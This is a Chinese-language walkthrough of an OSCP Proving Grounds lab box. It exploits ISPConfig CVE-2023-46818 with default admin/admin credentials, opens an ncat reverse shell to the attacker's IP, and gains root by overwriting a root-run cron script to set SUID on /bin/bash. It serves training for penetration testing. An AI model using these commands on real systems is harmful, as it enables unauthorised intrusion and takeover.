OSCP - Proving Grounds- CVE-2023-46818
主要知识点
- 弱密码
- cron job提权
具体步骤
nmap开始
Nmap scan report for 192.168.132.101
Host is up (0.44s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 51:56:a7:34:16:8e:3d:47:17:c8:96:d5:e6:94:46:46 (RSA)
| 256 fe:76:e3:4c:2b:f6:f5:21:a2:4d:9f:59:52:39:b9:16 (ECDSA)
|_ 256 2c:dd:62:7d:d6:1c:f4:fd:a1:e4:c8:aa:11:ae:d6:1f (ED25519)
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-favicon: Unknown favicon MD5: E005890E1A93A4D04F2DB906C74066E1
| http-title: ISPConfig
|_Requested resource was /login/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/
8080/tcp open http Apache httpd
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache
8081/tcp open http Apache httpd
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache
|_http-title: 403 Forbidden
开放的端口有点多,先看80端口吧,查一下 确实有ISPCONFIG这个工具
优先尝试弱密码 ,发现admin/admin可以成功登录
同时查看相关的vulnerability,首先发现下面的exp,不过好像不是很好用,但给出了一个线索 ,该exp关联的就是CVE-2023-46818,和machine的名字一样
ISPConfig 3.2.11 PHP Code Injection ≈ Packet Storm
继续搜索CVE-2023-46818的exp GitHub - bipbopbup/CVE-2023-46818-python-exploit: CVE-2023-46818 IPSConfig Python exploit这个是好用的,可以得到reverse shell,不过这个限制比较多,咱们需要一个更好的reverse shell
C:\home\kali\Documents\OFFSEC\WarmUp\CVE-2023-46818\CVE-2023-46818-python-exploit-main> python exploit.py http://192.168.132.101 admin admin
[+] Target URL: http://192.168.132.101/
[+] Logging in with username 'admin' and password 'admin'
[+] Injecting shell
[+] Launching shell
ispconfig-shell#
于是先上传一个编译好的ncat,赋予执行权限后,本地启动nc -nlvp 80,而在remote 端的reverse shell中执行如下命令,新的reverse shell创建成功
/tmp/ncat -e /bin/bash 192.168.45.188 80C:\home\kali\Documents\OFFSEC\WarmUp\CVE-2023-46818> nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.188] from (UNKNOWN) [192.168.132.101] 38486
whereis python
python: /usr/bin/python3.8 /usr/lib/python3.9 /usr/lib/python2.7 /usr/lib/python3.8 /etc/python3.8 /usr/local/lib/python3.8
现在需要创建完整终端,之后查询sudo -l和SUID都没有收获,linpeas.sh也没看到什么有价值的线索
/usr/bin/python3.8 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ips:/usr/local/ispconfig/interface/web/admin$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
<l/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
www-data@ips:/usr/local/ispconfig/interface/web/admin$ export TERM=xterm-256color
<fig/interface/web/admin$ export TERM=xterm-256color
www-data@ips:/usr/local/ispconfig/interface/web/admin$ ^Z
zsh: suspended nc -nlvp 80
C:\home\kali\Documents\OFFSEC\WarmUp\CVE-2023-46818> stty raw -echo ; fg ;reset
[1] + continued nc -nlvp 80
0
www-data@ips:/usr/local/ispconfig/interface/web/admin$ stty columns 200 rows 200
但是在pspy64的结果中发现了
2024/11/12 15:47:01 CMD: UID=0 PID=37682 | /bin/bash /usr/local/ispconfig/server/server.sh 看起来reverse shell的用户对于该sh有写权限
www-data@ips:/tmp$ ls -l /usr/local/ispconfig/server/server.sh
-rwxr-x--- 1 www-data www-data 750 Sep 3 08:47 /usr/local/ispconfig/server/server.sh
修改server.sh为 chmod +s /bin/bash,则在下次运行的时候会赋予/bin/bash SUID权限
www-data@ips:/usr/local/ispconfig/server$ echo "chmod +s /bin/bash" > server.sh
www-data@ips:/usr/local/ispconfig/server$ chmod +x server.sh
www-data@ips:/usr/local/ispconfig/server$ ls -l /bin/bash
-rwsr-sr-x 1 root root 1183448 Apr 18 2022 /bin/bash
www-data@ips:/usr/local/ispconfig/server$ /bin/bash -p
bash-5.0# id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data),1001(ispapps),1002(ispconfig)
bash-5.0# find / -type f -name proof.txt 2>/dev/null
/usr/local/ispconfig/interface/web/admin/proof.txt
bash-5.0# cat /usr/local/ispconfig/interface/web/admin/proof.txt
a468b9c91fcee9d14adf1ae2e51e45e5